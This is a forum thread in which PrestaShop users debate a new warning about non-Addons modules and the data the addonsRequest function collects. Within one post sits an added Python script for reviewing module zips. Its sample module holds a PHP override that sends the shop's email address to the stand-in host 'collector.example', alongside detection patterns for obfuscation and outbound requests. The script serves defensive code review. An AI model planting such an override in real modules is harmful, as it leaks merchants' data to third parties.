Prestashop module installation and scary alert message


#1

I’m writing here as a Prestashop shop owner. This is my first post in the forum as I have good reasons to express and share my concerns with the Codecanyon community.

The latest PrestaShop release 1.6.0.9 ships with a new and very threatening popup alert that WILL cause real confusion with many shop owners: the alert message pops up when you try to install a module that was not purchased from Addons, with a scary warning that seems to indicate there’s a high potential for security-related or legal problems. It is a pity that a well-known open-source script takes this kind of initiative.

It is a clear attempt to limit competition and digital marketplaces like Codecanyon and Themeforest by scaring users into thinking their shop may be in danger by installing modules like the ones sold in the various marketplaces like yours.

I hereby ask Codecanyon (and Themeforest) staff to make a clear statement that all the modules are tested and do not contain any backdoors, any viruses, any spam messages, any security flaws and vulnerabilities that could harm the safety of your customers and their e-commerce websites.

Many thanks,


#2

Hello raoulfild,

As a PrestaShop theme and modules developer I understand your concerns and I would like to share my insight on this matter and a few tips to avoid these issues.

First of all I would like to say that before PrestaShop added this warning message (about a month or 2 ago) people were installing modules from all sorts of places such as marketplaces other than PrestaShop Addons or developers’ own websites and no one had any problems. Of course this doesn’t mean problems can’t arise, some people might have evil intentions after all.

However you can test the module first on a local web server and also you can skim through the code to spot potential threats before installing the module to your online store. Also you should always create a backup of your store files and database before installing a new module or theme, even if it’s purchased from PrestaShop Addons. Just by taking these precautionary steps you won’t have trouble with any theme or module and in case something does go wrong you can revert back to your shop without any worries.

Moreover I believe that most developers won’t risk their account being banned from the marketplace they make a living out of for adding harmful code in their modules.

Hope this helps :slight_smile:


#3

Thank you for your advice and precautionary steps.
My concerns are less about myself! It is more about the signal we are getting from the company behind the software. I have some skills in PHP and web development and I have been using Prestashop since 2009. You would agree with me that developing plugins for this e-commerce script is getting complex. Unfortunately as a merchant I don’t have time to look into the code anymore. But since I got this confusing pop-up dialog I skimmed through the code and I came across a few surprises. I can guarantee you that I spotted a few PHP methods that are email address/shop url suckers. I consider now Prestashop itself to be the first back door to my shop.
Just look for yourself at the GitHub repository from https://github.com/PrestaShop/PrestaShop/blob/1.6/classes/Tools.php#L2937
to https://github.com/PrestaShop/PrestaShop/blob/1.6/classes/Tools.php#L2947

The static function addonsRequest collects more than unnecessary data like email and shop url and it is used in various places in the script. You could imagine how often your data is sent to Prestashop!
I’m not sure that Prestashop guarantees my privacy anymore.
I’m considering moving my shop to another cart.


#4

That function looks ok-ish to me. Indeed the shop url and email seem like they have no place there. However I think, of course I can’t be sure about this, that they use shop url for statistics to see how many shops are active and email probably for spam but I have never seen them send spam so I don’t think you should be worried about this. When you install PrestaShop you have the option to subscribe to the newsletter and they get your email address from the database with a code similar to that.

Regarding privacy I don’t think anyone offers real privacy. Once you are on the internet there is no more privacy no matter how much you try to be protected. If you are worried that PrestaShop has your email and shop url think that Google or Facebook or other businesses such as these collect even more sensitive data than this. Even a website with cookies can store quite a bit of data on you.

The real issue I spot here is for 3rd party developers who can manipulate these functions by overrides and can use that data for whatever purpose they see fit.
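
The pre-install code review suggested in #2 and the override concern raised in #4 can be partly automated. The following is an added example, not part of any post in this thread and not PrestaShop code: it inspects a module zip without extracting it, lists core-class overrides the package would install, and flags lines worth reading. The pattern list, the module name `examplemodule`, and the `collector.example` host are assumptions made for illustration.

```python
import io
import re
import zipfile

# Heuristic patterns (assumption: tune for your own review).
# A hit means "read this line", not "this module is malicious".
PATTERNS = {
    "dynamic-code": re.compile(r"\b(eval|create_function)\s*\("),
    "obfuscation": re.compile(r"\b(base64_decode|gzinflate|str_rot13)\s*\("),
    "outbound-request": re.compile(r"\b(curl_exec|fsockopen|mail)\s*\(|file_get_contents\s*\(\s*['\"]https?://"),
    "shop-identity": re.compile(r"PS_SHOP_EMAIL|getShopDomain|addonsRequest"),
}

def review_module_zip(data: bytes) -> dict:
    """Return {'overrides': [paths], 'findings': [(path, line_no, label)]}."""
    overrides, findings = [], []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for name in sorted(zf.namelist()):
            if not name.lower().endswith(".php"):
                continue
            # Modules carry core overrides under <module>/override/...
            if "override" in name.split("/")[1:-1]:
                overrides.append(name)
            text = zf.read(name).decode("utf-8", errors="replace")
            for no, line in enumerate(text.splitlines(), 1):
                for label, rx in PATTERNS.items():
                    if rx.search(line):
                        findings.append((name, no, label))
    return {"overrides": overrides, "findings": findings}

def build_sample_zip() -> bytes:
    """Constructed sample module (hypothetical), built in memory for the demo."""
    files = {
        "examplemodule/examplemodule.php": "<?php\nclass ExampleModule extends Module {}\n",
        "examplemodule/override/classes/Tools.php":
            "<?php\nclass Tools extends ToolsCore {\n"
            "  public static function addonsRequest($request, $params = array()) {\n"
            "    $m = Configuration::get('PS_SHOP_EMAIL');\n"
            "    file_get_contents('https://collector.example/?m=' . urlencode($m));\n"
            "    return parent::addonsRequest($request, $params);\n"
            "  }\n}\n",
    }
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for path, body in files.items():
            zf.writestr(path, body)
    return buf.getvalue()
```

Any entry under `overrides` deserves a full read before installation, since it replaces core behaviour for the whole shop rather than adding a feature.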


#5

Hope that Prestashop is not going to lock the script though, it is more and more closely associated with addons.


#6

Hello,

I think this development is against the community. I developed a function to self-sign modules to avoid this message. Feel free to follow me on twitter (@arnolem). I will put this code online as soon as I have properly tested it.